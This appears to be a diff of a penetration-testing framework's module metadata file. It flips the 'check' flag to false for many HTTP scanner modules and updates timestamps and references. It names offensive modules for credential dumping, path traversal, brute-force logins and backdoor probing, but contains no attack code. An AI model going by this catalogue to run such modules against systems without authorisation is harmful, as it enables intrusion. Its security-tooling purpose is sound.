@@ -23000,11 +23182,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-19 10:15:46 +0000",
    "path": "/modules/auxiliary/scanner/http/dir_listing.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dir_listing",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23046,11 +23228,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-19 10:15:46 +0000",
    "path": "/modules/auxiliary/scanner/http/dir_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dir_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23100,7 +23282,7 @@
    "path": "/modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dir_webdav_unicode_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23146,7 +23328,7 @@
    "path": "/modules/auxiliary/scanner/http/directadmin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/directadmin_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23193,7 +23375,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_dir_300_615_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_dir_300_615_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23240,7 +23422,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_dir_615h_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_dir_615h_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23287,7 +23469,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_dir_session_cgi_http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_dir_session_cgi_http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23335,7 +23517,7 @@
    "path": "/modules/auxiliary/scanner/http/dlink_user_agent_backdoor.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dlink_user_agent_backdoor",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23384,7 +23566,7 @@
    "path": "/modules/auxiliary/scanner/http/dnalims_file_retrieve.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dnalims_file_retrieve",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23430,7 +23612,7 @@
    "path": "/modules/auxiliary/scanner/http/docker_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/docker_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -23476,7 +23658,7 @@
    "path": "/modules/auxiliary/scanner/http/dolibarr_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/dolibarr_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23570,7 +23752,7 @@
    "path": "/modules/auxiliary/scanner/http/ektron_cms400net.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ektron_cms400net",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23702,7 +23884,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_dump_config.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_dump_config",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23749,7 +23931,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_dump_hashes",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23796,7 +23978,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_get_chart_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_get_chart_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23843,7 +24025,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_ping_cmd_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_ping_cmd_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23890,7 +24072,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_reset_pass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_reset_pass",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -23936,7 +24118,7 @@
    "path": "/modules/auxiliary/scanner/http/epmp1000_web_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/epmp1000_web_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -23982,7 +24164,7 @@
    "path": "/modules/auxiliary/scanner/http/error_sql_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/error_sql_injection",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24034,7 +24216,7 @@
    "path": "/modules/auxiliary/scanner/http/es_file_explorer_open_port.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/es_file_explorer_open_port",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24080,7 +24262,7 @@
    "path": "/modules/auxiliary/scanner/http/etherpad_duo_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/etherpad_duo_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -24176,7 +24358,7 @@
    "path": "/modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/f5_bigip_virtual_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24224,7 +24406,7 @@
    "path": "/modules/auxiliary/scanner/http/f5_mgmt_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/f5_mgmt_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24270,7 +24452,7 @@
    "path": "/modules/auxiliary/scanner/http/file_same_name_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/file_same_name_dir",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24316,7 +24498,7 @@
    "path": "/modules/auxiliary/scanner/http/files_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/files_dir",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24362,7 +24544,7 @@
    "path": "/modules/auxiliary/scanner/http/fortinet_ssl_vpn.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/fortinet_ssl_vpn",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -24411,7 +24593,7 @@
    "path": "/modules/auxiliary/scanner/http/frontpage_credential_dump.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/frontpage_credential_dump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24458,7 +24640,7 @@
    "path": "/modules/auxiliary/scanner/http/frontpage_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/frontpage_login",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24504,7 +24686,7 @@
    "path": "/modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gavazzi_em_login_loot",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24551,7 +24733,7 @@
    "path": "/modules/auxiliary/scanner/http/git_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/git_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24597,7 +24779,7 @@
    "path": "/modules/auxiliary/scanner/http/gitlab_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24643,7 +24825,7 @@
    "path": "/modules/auxiliary/scanner/http/gitlab_user_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/gitlab_user_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24691,7 +24873,7 @@
    "path": "/modules/auxiliary/scanner/http/glassfish_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/glassfish_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -24740,7 +24922,7 @@
    "path": "/modules/auxiliary/scanner/http/glassfish_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/glassfish_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24788,7 +24970,7 @@
    "path": "/modules/auxiliary/scanner/http/goahead_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/goahead_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24838,7 +25020,7 @@
    "path": "/modules/auxiliary/scanner/http/groupwise_agents_http_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/groupwise_agents_http_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24882,11 +25064,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-22 15:09:08 +0000",
    "path": "/modules/auxiliary/scanner/http/host_header_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/host_header_injection",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24936,7 +25118,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_bims_downloadservlet_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_bims_downloadservlet_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -24986,7 +25168,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_faultdownloadservlet_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_faultdownloadservlet_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25036,7 +25218,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_ictdownloadservlet_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_ictdownloadservlet_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25086,7 +25268,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_reportimgservlt_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_reportimgservlt_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25136,7 +25318,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_imc_som_file_download.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_imc_som_file_download",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25185,7 +25367,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getfileinternal_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getfileinternal_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25234,7 +25416,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_getsitescopeconfiguration",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25283,7 +25465,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sitescope_loadfilecontent_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25329,7 +25511,7 @@
    "path": "/modules/auxiliary/scanner/http/hp_sys_mgmt_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/hp_sys_mgmt_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -25377,7 +25559,7 @@
    "path": "/modules/auxiliary/scanner/http/http_header.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_header",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25423,7 +25605,7 @@
    "path": "/modules/auxiliary/scanner/http/http_hsts.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_hsts",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25471,7 +25653,7 @@
    "path": "/modules/auxiliary/scanner/http/http_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -25519,7 +25701,7 @@
    "path": "/modules/auxiliary/scanner/http/http_put.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_put",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25616,7 +25798,7 @@
    "path": "/modules/auxiliary/scanner/http/http_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25662,7 +25844,7 @@
    "path": "/modules/auxiliary/scanner/http/http_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/http_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25699,7 +25881,7 @@
    "path": "/modules/auxiliary/scanner/http/httpbl_lookup.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/httpbl_lookup",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25767,7 +25949,9 @@
    ],
    "description": "Collect any leaked internal IPs by requesting commonly redirected locations from IIS.",
    "references": [
-
+      "CVE-2000-0649",
+      "BID-1499",
+      "EDB-20096"
    ],
    "platform": "",
    "arch": "",
@@ -25788,11 +25972,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-08-26 21:01:10 +0000",
+    "mod_time": "2019-12-08 16:15:48 +0000",
    "path": "/modules/auxiliary/scanner/http/iis_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/iis_internal_ip",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -25936,7 +26120,7 @@
    "path": "/modules/auxiliary/scanner/http/infovista_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/infovista_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -25984,7 +26168,7 @@
    "path": "/modules/auxiliary/scanner/http/intel_amt_digest_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/intel_amt_digest_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26030,7 +26214,7 @@
    "path": "/modules/auxiliary/scanner/http/ipboard_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ipboard_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26080,7 +26264,7 @@
    "path": "/modules/auxiliary/scanner/http/jboss_status.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jboss_status",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26131,7 +26315,7 @@
    "path": "/modules/auxiliary/scanner/http/jboss_vulnscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jboss_vulnscan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26181,7 +26365,7 @@
    "path": "/modules/auxiliary/scanner/http/jenkins_command.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_command",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26227,7 +26411,7 @@
    "path": "/modules/auxiliary/scanner/http/jenkins_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26274,7 +26458,7 @@
    "path": "/modules/auxiliary/scanner/http/jenkins_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/jenkins_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26320,7 +26504,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_bruteforce_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_bruteforce_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26366,7 +26550,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_ecommercewd_sqli_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26413,7 +26597,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_gallerywd_sqli_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_gallerywd_sqli_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26459,7 +26643,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_pages.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_pages",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26505,7 +26689,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_plugins.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_plugins",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26551,7 +26735,7 @@
    "path": "/modules/auxiliary/scanner/http/joomla_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/joomla_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26598,7 +26782,7 @@
    "path": "/modules/auxiliary/scanner/http/kodi_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/kodi_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26645,7 +26829,7 @@
    "path": "/modules/auxiliary/scanner/http/linknat_vos_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/linknat_vos_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26695,7 +26879,7 @@
    "path": "/modules/auxiliary/scanner/http/linksys_e1500_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/linksys_e1500_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -26745,7 +26929,7 @@
    "path": "/modules/auxiliary/scanner/http/litespeed_source_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/litespeed_source_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26791,7 +26975,7 @@
    "path": "/modules/auxiliary/scanner/http/lucky_punch.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/lucky_punch",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26841,7 +27025,7 @@
    "path": "/modules/auxiliary/scanner/http/majordomo2_directory_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/majordomo2_directory_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26887,7 +27071,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_desktop_central_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -26934,7 +27118,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -26983,7 +27167,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_deviceexpert_user_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_deviceexpert_user_creds",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27031,7 +27215,7 @@
    "path": "/modules/auxiliary/scanner/http/manageengine_securitymanager_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/manageengine_securitymanager_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27081,7 +27265,7 @@
    "path": "/modules/auxiliary/scanner/http/mediawiki_svg_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mediawiki_svg_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27129,7 +27313,7 @@
    "path": "/modules/auxiliary/scanner/http/meteocontrol_weblog_extractadmin.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/meteocontrol_weblog_extractadmin",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27175,7 +27359,7 @@
    "path": "/modules/auxiliary/scanner/http/mod_negotiation_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mod_negotiation_brute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27221,7 +27405,7 @@
    "path": "/modules/auxiliary/scanner/http/mod_negotiation_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mod_negotiation_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27272,7 +27456,7 @@
    "path": "/modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ms09_020_webdav_unicode_bypass",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27372,7 +27556,7 @@
    "path": "/modules/auxiliary/scanner/http/mybook_live_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/mybook_live_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27421,7 +27605,7 @@
    "path": "/modules/auxiliary/scanner/http/netdecision_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/netdecision_traversal",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27470,7 +27654,7 @@
    "path": "/modules/auxiliary/scanner/http/netgear_sph200d_traversal.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/netgear_sph200d_traversal",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -27520,7 +27704,7 @@
    "path": "/modules/auxiliary/scanner/http/nginx_source_disclosure.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/nginx_source_disclosure",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27567,7 +27751,7 @@
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_fsfui_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_fsfui_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27615,7 +27799,7 @@
    "path": "/modules/auxiliary/scanner/http/novell_file_reporter_srs_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_file_reporter_srs_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27664,7 +27848,7 @@
    "path": "/modules/auxiliary/scanner/http/novell_mdm_creds.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/novell_mdm_creds",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27710,7 +27894,7 @@
    "path": "/modules/auxiliary/scanner/http/ntlm_info_enumeration.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/ntlm_info_enumeration",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27756,7 +27940,7 @@
    "path": "/modules/auxiliary/scanner/http/octopusdeploy_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/octopusdeploy_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27789,11 +27973,11 @@

    ],
    "targets": null,
-    "mod_time": "2019-04-25 20:43:55 +0000",
+    "mod_time": "2019-11-01 19:20:22 +0000",
    "path": "/modules/auxiliary/scanner/http/onion_omega2_login.py",
    "is_install_path": true,
    "ref_name": "scanner/http/onion_omega2_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -27840,7 +28024,7 @@
    "path": "/modules/auxiliary/scanner/http/open_proxy.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/open_proxy",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27886,7 +28070,7 @@
    "path": "/modules/auxiliary/scanner/http/openmind_messageos_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/openmind_messageos_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -27937,7 +28121,7 @@
    "path": "/modules/auxiliary/scanner/http/options.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/options",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -27986,7 +28170,7 @@
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_database_credentials_leak.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_database_credentials_leak",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28035,7 +28219,7 @@
    "path": "/modules/auxiliary/scanner/http/oracle_demantra_file_retrieval.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_demantra_file_retrieval",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28081,7 +28265,7 @@
    "path": "/modules/auxiliary/scanner/http/oracle_ilom_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/oracle_ilom_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28118,7 +28302,7 @@
    "path": "/modules/auxiliary/scanner/http/owa_ews_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_ews_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28164,7 +28348,7 @@
    "path": "/modules/auxiliary/scanner/http/owa_iis_internal_ip.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_iis_internal_ip",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28218,7 +28402,7 @@
    "path": "/modules/auxiliary/scanner/http/owa_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/owa_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28264,7 +28448,7 @@
    "path": "/modules/auxiliary/scanner/http/phpmyadmin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/phpmyadmin_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28310,7 +28494,7 @@
    "path": "/modules/auxiliary/scanner/http/pocketpad_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/pocketpad_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -28356,7 +28540,7 @@
    "path": "/modules/auxiliary/scanner/http/prev_dir_same_name_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/prev_dir_same_name_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28402,7 +28586,7 @@
    "path": "/modules/auxiliary/scanner/http/radware_appdirector_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/radware_appdirector_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -28449,7 +28633,7 @@
    "path": "/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_json_yaml_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28495,7 +28679,7 @@
    "path": "/modules/auxiliary/scanner/http/rails_mass_assignment.rb",
    "is_install_path": true,
    "ref_name": "scanner/http/rails_mass_assignment",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -28543,7 +28727,7 @@
